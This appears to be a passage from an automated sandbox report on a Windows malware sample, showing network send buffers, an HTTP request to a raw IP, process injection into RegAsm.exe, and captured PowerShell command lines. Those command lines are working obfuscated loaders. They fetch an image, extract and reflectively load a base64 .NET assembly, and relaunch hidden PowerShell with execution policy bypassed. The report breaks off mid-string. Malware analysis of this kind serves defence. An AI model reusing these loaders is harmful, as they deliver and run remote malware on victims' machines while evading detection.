 buffer: FBAK- Öþ.ïä-ò(“îÊ-fb’½‚Ïä8‡ji· Çr_ÖDºÓIv¼Kák=>¢Ù­Õ A]ˆ’„/½0%oFlÐ'¦>¥ß™àåÓi>À’‡? Ä¤Pëí¤\VÄÁ“ÿ+ŽN‹ó¹ 
socket: 1444
sent: 134
1 134 0

send

 buffer: €HHif>•C‘…g5£ßuÕr%õøÿ՛ܓA„vSî°Ä¨SDR.wpæ‹ ò#V™ÁÒøÏ£‚Q&RZ&1®´CØFìäȁj™ä"hž/.¿&ޞ*~$ݎ4wУƬÿyu (3BFkç¹Ï×–¨
socket: 1444
sent: 133
1 133 0

send

 buffer: GET /file/PuttyLinks.txt HTTP/1.1 Host: 107.175.113.212 Connection: Keep-Alive
socket: 920
sent: 84
1 84 0
Process injection Process 2272 called NtSetContextThread to modify thread in remote process 2680
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4843558
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000035c
process_identifier: 2680
1 0 0
parent_process powershell.exe martian_process C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
parent_process powershell.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnNrbmlMeXR0dVAvZWxpZi8yMTIuMzExLjU3MS43MDEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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KGXkhpYIrIKGXHMhpYIrIKGXdhpYIrIKGXBhhpYIrIKGXHIhpYIrIKGXdhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXZQhpYIrIKGXghpYIrIKGXDhpYIrIKGXhpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGEhpYIrIKGXbgBkhpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXdhpYIrIKGXhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGXghpYIrIKGXCshpYIrIKGXPQhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEYhpYIrIKGXbhpYIrIKGXBhhpYIrIKGXGchpYIrIKGXLgBMhpYIrIKGXGUhpYIrIKGXbgBnhpYIrIKGXHQhpYIrIKGXahpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXYgBhhpYIrIKGXHMhpYIrIKGXZQhpYIrIKGX2hpYIrIKGXDQhpYIrIKGXThpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZwB0hpYIrIKGXGghpYIrIKGXIhpYIrIKGXhpYIrIKGX9hpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBzhpYIrIKGXHQh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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
parent_process wscript.exe martian_process powershell -command "$Codigo = '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